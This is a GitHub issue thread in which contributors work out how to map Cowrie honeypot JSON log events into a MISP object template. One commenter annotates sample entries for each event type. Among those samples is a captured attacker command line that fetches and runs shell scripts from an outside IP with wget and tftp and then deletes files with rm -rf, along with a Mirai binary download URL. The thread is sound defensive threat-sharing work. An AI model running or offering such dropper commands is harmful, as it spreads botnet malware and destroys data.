Comments (7)
bontchev
commented on August 17, 2024
2
As I mentioned on Twitter, I don't have experience with MISP (I just want to use it to share the data collected by our honeypot), so apologies if I say something stupid. I do, however, have significant experience with Cowrie - have been running it for more than a year and have made some minor improvements to it. Here are some additional remarks to what I posted on Twitter.
-
sessionisn't the only key that is present in every JSON entry in the log. The other such keys areeventid,timestamptandsensor. -
The "important" key in the log entry is the
eventid. It determines what other keys will be present in the entry.
Here are some examples of the different kinds of events that I have found in my logs, with the keys that are present in each one of them. The comments are mine:
{
"eventid": "cowrie.client.fingerprint",
"username": "root", // username of the logged in attacker, not important (available from elsewhere)
"timestamp": "2017-02-12T14:20:04.834341Z",
"message": "public key attempt for user root with fingerprint 7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89", // message of the SSH connector, not important
"fingerprint": "7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89", // fingerprint of the SSH connector
"system": "SSHService 'ssh-userauth' on HoneyPotSSHTransport,68,185.110.132.202", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "185.110.132.202", // IP address of the attacker
"session": "8b1707a6",
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.client.size",
"timestamp": "2017-01-23T16:20:13.983063Z",
"message": "Terminal Size: 24 280", // Message produced by the SSH connector, not important
"system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,49,109.236.86.63", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"height": 280, // height of the terminal session, not important
"src_ip": "109.236.86.63", // IP address of the attacker
"width": 24, // width of the terminal session, not important
"isError": 0, // whether an error occurred, not important
"session": "182c9773",
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.client.version",
"macCS": ["hmac-sha1", "hmac-md5", "hmac-sha2-256"], // HMAC algorithms supported by the attacker, not important
"timestamp": "2017-01-23T09:54:10.873561Z",
"session": "b309521c",
"kexAlgs": ["diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1", "diffie-hellman-group-exchange-sha1", "diffie-hellman-group-exchange-sha256"], // key exchange algorithms supported by the attacker, not important
"keyAlgs": ["ssh-rsa", "ssh-dss"], // public key algorithms supported by the attacker, not important
"message": "Remote SSH version: SSH-2.0-ssh2js0.3.6", // Message produced by the SSH connector, not important
"system": "HoneyPotSSHTransport,1,91.224.161.88", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "91.224.161.88", // IP address of the attacker
"version": "SSH-2.0-ssh2js0.3.6", // SSH client of the attacker
"compCS": ["none"], // no idea what this is, not important
"sensor": "vesselin-pc",
"encCS": ["3des-cbc", "aes256-ctr", "aes256-cbc", "aes192-ctr", "aes192-cbc", "aes128-cbc", "blowfish-cbc", "aes128-ctr", "cast128-cbc"] // encryption algorithms supported by the attacker, not important
}
{
"eventid": "cowrie.command.failed",
"timestamp": "2017-01-22T07:25:37.252756Z",
"message": "Command not found: system", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,0,118.179.176.136", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "118.179.176.136", // IP address of the attacker
"session": "e7e8bc30",
"input": "system", // command entered by the attacker (not supported by the emulated system, so it failed)
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.command.input",
"timestamp": "2017-01-22T07:25:36.762093Z",
"message": "CMD: enable", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,0,118.179.176.136", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "118.179.176.136", // IP address of the attacker
"session": "e7e8bc30",
"input": "enable", // command entered by the attacker
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.command.success",
"timestamp": "2017-01-22T07:25:36.763907Z",
"message": "Command found: enable ", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,0,118.179.176.136", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "118.179.176.136", // IP address of the attacker
"session": "e7e8bc30",
"input": "enable ", // command entered by the attacker (supported by the emulated system, so it succeeded)
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.direct-tcpip.data",
"timestamp": "2017-01-23T14:18:48.114297Z",
"sensor": "vesselin-pc",
"system": "SSHChannel None (8) on SSHService 'ssh-connection' on HoneyPotSSHTransport,21,5.45.68.142", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "5.45.68.142", // IP address of the attacker
"session": "c9236624",
"dst_port": 25, // port to which the attacker is connecting
"dst_ip": "173.194.222.27", // IP to which the attacker is connecting
"data": "'QUIT\\r\\n'", // data sent by the attacker
"message": "direct-tcp forward to 173.194.222.27:25 with data 'QUIT\\r\\n'" // Message produced by the SSH connector, not important
}
{
"eventid": "cowrie.direct-tcpip.request",
"timestamp": "2017-01-23T13:05:35.002275Z",
"session": "6bf10bd8",
"src_port": 22, // port from which the attacker is connecting
"message": "direct-tcp connection request to 94.137.63.251:443 from 127.0.0.1:22", // Message produced by the SSH connector, not important
"system": "SSHService 'ssh-connection' on HoneyPotSSHTransport,20,5.45.66.6", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "5.45.66.6", // IP address of the attacker
"dst_port": 443, // port to which the attacker is connecting
"dst_ip": "94.137.63.251", // IP to which the attacker is connecting
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.log.closed",
"timestamp": "2017-01-23T07:27:06.632719Z",
"message": "Closing TTY Log: log/tty/20170123-092633-None-0i.log after 32 seconds", // message of the Telnet connector, not important
"ttylog": "log/tty/20170123-092633-None-0i.log", // name of the local input log file, not important
"system": "CowrieTelnetTransport,0,46.166.142.56", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"src_ip": "46.166.142.56", // IP address of the attacker
"session": "c396b595",
"duration": 32.80147910118103, // session duration
"sensor": "vesselin-pc",
"isError": 0, // whether an error occurred, not important
"size": 12984 // size of the input log file, not important
}
{
"eventid": "cowrie.log.open",
"timestamp": "2017-01-23T07:26:33.865075Z",
"message": "Opening TTY Log: log/tty/20170123-092633-None-0i.log", // message of the Telnet connector, not important
"ttylog": "log/tty/20170123-092633-None-0i.log", // name of the input log file
"system": "CowrieTelnetTransport,0,46.166.142.56", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "46.166.142.56", // IP address of the attacker
"session": "c396b595",
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.login.failed",
"username": "admin", // username used during an unsuccessful login attempt
"timestamp": "2017-01-23T07:40:26.409071Z",
"message": "login attempt [admin/4321] failed", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,19,42.117.30.27", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "42.117.30.27", // IP address of the attacker
"session": "f6bf51aa",
"password": "4321", // password used during an unsuccessful login attempt
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.login.success",
"username": "root", // username used during a successful login attempt
"timestamp": "2017-01-23T07:26:33.333922Z",
"message": "login attempt [root/666666] succeeded", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,0,46.166.142.56", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "46.166.142.56", // IP address of the attacker
"session": "c396b595",
"password": "666666", // password used during a successful login attempt
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.session.closed",
"timestamp": "2017-01-23T07:27:06.639586Z",
"message": "Connection lost after 37 seconds", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,0,46.166.142.56", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "46.166.142.56", // IP address of the attacker
"duration": 37.55857801437378, // session duration
"session": "c396b595",
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.session.connect",
"timestamp": "2017-01-23T07:26:29.081081Z",
"session": "c396b595",
"message": "New connection: 46.166.142.56:58692 (192.168.0.102:23) [session: TT0]", // message of the Telnet connector, not important
"src_port": 58692, // source port of the attacker
"system": "cowrie.telnet.transport.HoneyPotTelnetFactory", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "46.166.142.56", // IP address of the attacker
"dst_port": 23, // destination port of the attacker
"dst_ip": "192.168.0.102", // destination IP of the attacker, not important
"sensor": "vesselin-pc"
}
{
"eventid": "cowrie.session.file_download",
"src_ip": "109.236.92.150", // IP address of the attacker
"session": "3d1ddc4f",
"shasum": "f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6", // SHA-256 of the uploaded file
"url": "http://109.201.134.120:80/bins/mirai.x86", // URL of the uploaded file
"timestamp": "2017-01-23T12:30:58.682695Z",
"outfile": "dl/f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6", // local file name of the uploaded file, not important
"sensor": "vesselin-pc",
"message": "Downloaded URL (http://109.201.134.120:80/bins/mirai.x86) with SHA-256 f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6 to dl/f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6" // message of the Telnet connector, not important
}
{
"eventid": "cowrie.session.file_upload",
"shasum": "891b01d92d0366fbb4af44135cfb9b4b9f9d2b28cc052f70cb9724ef30545608", // SHA-256 of the uploaded file
"timestamp": "2017-05-11T15:37:19.162358Z",
"message": "SFTP Uploaded file \"fuck\" to dl/891b01d92d0366fbb4af44135cfb9b4b9f9d2b28cc052f70cb9724ef30545608", // Message produced by the SSH connector, not important
"system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,27242,220.94.216.160", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"filename": "fuck", // Name of the uploaded file
"src_ip": "220.94.216.160", // IP address of the attacker
"outfile": "dl/891b01d92d0366fbb4af44135cfb9b4b9f9d2b28cc052f70cb9724ef30545608", // local file name of the uploaded file, not important
"session": "c3fef1c9",
"sensor": "vess-box",
"isError": 0 // whether an error occurred, not important
}
{
"eventid": "cowrie.session.input",
"realm": "cat", // not sure what this is, not important
"input": "cd /tmp || cd /var/system || cd /mnt || cd /lib || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.158.115.201/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.115.201 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.115.201; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *.sh; rm -rf *", // the command line as entered by the attacker
"timestamp": "2017-04-02T10:32:17.353036Z",
"message": "INPUT (cat): cd /tmp || cd /var/system || cd /mnt || cd /lib || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.158.115.201/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.115.201 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.115.201; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *.sh; rm -rf *", // message of the Telnet connector, not important
"system": "CowrieTelnetTransport,6683,181.20.74.193", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "181.20.74.193", // IP address of the attacker
"session": "7307ec97",
"sensor": "vess-box"
}
{
"eventid": "cowrie.client.var",
"name": "LANG", // Variable name
"value": "en_GB.UTF-8", // Variable value
"timestamp": "2018-02-04T08:17:44.128571Z",
"message": "request_env: LANG=en_GB.UTF-8", // Message produced by the SSH connector, not important
"system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,3613,118.33.75.186", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "118.33.75.186", // IP address of the attacker
"session": "8464c7a4f50f",
"sensor": "yoda"
}
from misp-objects.
adulau
commented on August 17, 2024
1
Good point. Looking at the source code, cowrie now supports the HASSH from Salesforce. I updated the MISP object of cowrie to match the hassh type that we have in MISP. I didn't disable the correlation until now as I'm wondering the number of FP on correlation on HASSH.
@gallypette maybe we should check this on the Passive SSL side too.
from misp-objects.
adulau
commented on August 17, 2024
Object updated to add SSH sessions a93a285
More test will follow tomorrow to add files and sighting. PR to Cowrie should follow soon.
from misp-objects.
adulau
commented on August 17, 2024
- Redis input in Cowrie (avoid blocking or slowing down honeypot sessions) and allowing generic JSON input - PR merged.
- Generic wrapper to easily add object or attributes from honeypots like Cowrie or Kippo.
- Consumer for Redis input (from Cowrie and other honeypot) to update a daily event in a MISP. first version.
- Create a specific Cowrie object template.
- Import Cowrie object from the Consumer Redis CowrieMISPObject.
- Allow weekly event in addition to daily event.
- A new blog post on misp-project.org to explain how to integrate MISP with honeypots and how to generate daily/weekly event and share it with the communities.
from misp-objects.
jaydesai-lintel
commented on August 17, 2024
@bontchev
Hi Bontchev,
I want to use the same log details in our application. I am not getting any solution to catch that all log events details like you mentioned above. Could you please help me?
I need to catch all the details like mentioned below for all events
{
"eventid": "cowrie.client.fingerprint",
"username": "root", // username of the logged in attacker, not important (available from elsewhere)
"timestamp": "2017-02-12T14:20:04.834341Z",
"message": "public key attempt for user root with fingerprint 7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89", // message of the SSH connector, not important
"fingerprint": "7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89", // fingerprint of the SSH connector
"system": "SSHService 'ssh-userauth' on HoneyPotSSHTransport,68,185.110.132.202", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "185.110.132.202", // IP address of the attacker
"session": "8b1707a6",
"sensor": "vesselin-pc"
}
from misp-objects.
bontchev
commented on August 17, 2024
It is possible that now the SSH fingerprint is recorded in a cowrie.client.kex event, see this:
from misp-objects.
adulau
commented on August 17, 2024
Cowrie object template is quite complete nowadays.
from misp-objects.
Related Issues (20)
- Add Source as Role for Organisation and Person HOT 1
- SigMF template object to add
- Extend pcap-metadata object with more fields
- DGA algo objet
- Update objects on events after Template edit
- Ambiguities regarding registry-key object HOT 1
- Incident object
- Review all objects for HOT 1
- Add scheduled tasks HOT 2
- Add description of "recommended" parameter in definition.json
- Campaign, intrusion-set and threat-actor object templates HOT 1
- Enriching victim objects HOT 1
- Add a physical/item object template
- Fail2Ban object (v5) has invalid RFC 4122 UUID HOT 1
- openai cti summarizer
- MISP submodules error when trying to update HOT 1
- Add scanner and scanner-query to network-profile object HOT 6
- Add CrowdStrike object
- MISP server doesn't add ip related object's attributes to an event.
- Add phone-number object
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from misp-objects.